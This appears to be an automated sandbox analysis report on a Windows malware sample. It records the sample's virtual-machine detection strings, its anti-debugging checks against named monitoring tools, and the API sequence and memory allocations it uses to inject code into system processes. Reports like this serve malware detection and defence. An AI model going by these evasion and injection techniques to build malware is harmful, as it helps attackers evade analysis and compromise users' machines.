            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000000.1429306447.000001D959F25000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000000.1429612710.000001D959FA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1450832815.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275899145.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB221000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SearchApp.exe, 0000000F.00000000.1578437841.000001F49D9E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: PfBjDhHzvV.exe, 00000000.00000002.2233613643.000000000009C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\HARDWARE\ACPI\DSDT\VBOX__em000
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
            Source: SearchApp.exe, 0000000F.00000000.1568102860.000001F49C520000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: hyper-vOs and f
            Source: SearchApp.exe, 0000000F.00000000.1602171177.000001F4AE805000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wesan
            Source: dwm.exe, 00000005.00000000.1392615637.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
            Source: SearchApp.exe, 0000000F.00000000.1600252821.000001F4AE777000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wNone
            Source: explorer.exe, 0000000A.00000003.2275899145.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
            Source: explorer.exe, 0000000A.00000003.2275899145.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: explorer.exe, 0000000A.00000003.2279706971.000000000730A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275899145.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
            Source: SearchApp.exe, 0000000F.00000000.1560988533.000001F49B2D6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: lhttps://www.bing.com/AS/API/WindowsCortanaPane/V2/InitFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: RuntimeBroker.exe, 00000013.00000000.1717523731.0000016213A57000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
            Source: SearchApp.exe, 0000000F.00000000.1560988533.000001F49B2D6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: SearchApp.exe, 0000000F.00000000.1571058542.000001F49D60D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1577540067.000001F49D980000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1548678406.000001EC9A5C0000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1567010034.000001F49BDBF000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560988533.000001F49B2D6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;nlse]
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: dwm.exe, 00000005.00000000.1392615637.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
            Source: explorer.exe, 0000000A.00000003.2279706971.000000000730A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
            Source: svchost.exe, 00000007.00000000.1425679854.0000018CE728E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1544900444.000001EC94D72000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: SearchApp.exe, 0000000F.00000000.1623611969.000001F4AEDB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: yexcelneroonenotelyncvmware:wux:itunesvisio&#xEF87binPT.vssxx86amd64objdFEHobjLRA.psd.dwg.ai
            Source: explorer.exe, 0000000A.00000002.3016089199.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275899145.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1450832815.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
            Source: SearchApp.exe, 0000000F.00000000.1578437841.000001F49D9E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w0@
            Source: SearchApp.exe, 0000000F.00000000.1544964068.000001EC94DA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
            Source: explorer.exe, 0000000A.00000002.2634147825.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Hides threads from debuggers
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread information set: HideFromDebuggerJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (window names)
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess queried: DebugObjectHandleJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_0129392D Sleep,lstrcpy,LoadLibraryA,GetProcAddress,FreeLibrary,lstrcat,LoadLibraryA,GetProcAddress,CreateThread,CreateThread,Sleep,Sleep,CreateThread,Sleep,Sleep,0_2_0129392D
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_01291EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,0_2_01291EF6
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 9D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: AD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: 10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 3B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 980000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: AB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 1080000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: BD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 8C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: ED0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 950000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 120000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 290000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 580000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: DB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: A80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2410000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2460000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2290000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 950000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 960000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: BF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: C00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 340000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 350000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1490000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2E70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2470000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 25C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 21D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2320000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2930000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2980000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 840000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 890000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2460000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 24B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2260000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2390000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 23E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 25B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 25C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2A90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2D00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2D60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 9C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 9D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1270000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1280000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2E10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2EB0000 protect: page execute and read and writeJump to behavior
